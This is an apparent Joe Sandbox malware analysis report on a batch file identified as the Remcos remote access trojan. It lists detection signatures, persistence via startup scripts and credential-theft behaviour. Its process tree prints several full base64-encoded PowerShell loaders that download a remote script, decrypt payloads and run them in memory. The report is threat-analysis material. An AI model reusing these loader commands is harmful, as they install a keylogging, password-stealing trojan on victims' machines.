Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5kldoushde.bat

Overview

General Information

Sample name:5kldoushde.bat
renamed because original name is a hash value
Original sample name:5dfaf610562ef70dcaff981d40952776ddd03d5171cdc99d85b735d3436d6e41.bat
Analysis ID:1612237
MD5:6ce4130989ecc8c8a5b9dcfb2fce5bbc
SHA1:0539081ca0c3f3306d4a3057e48d51b713a39b8f
SHA256:5dfaf610562ef70dcaff981d40952776ddd03d5171cdc99d85b735d3436d6e41
Tags:abokirem-duckdns-orgbatuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2752 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\5kldoushde.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4984 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\5kldoushde.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3676 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 1356 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6084 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 2368 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6308 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6860 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2368 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6616 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 3604 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4568 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7164 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 4980 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4780 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 280 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6324 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW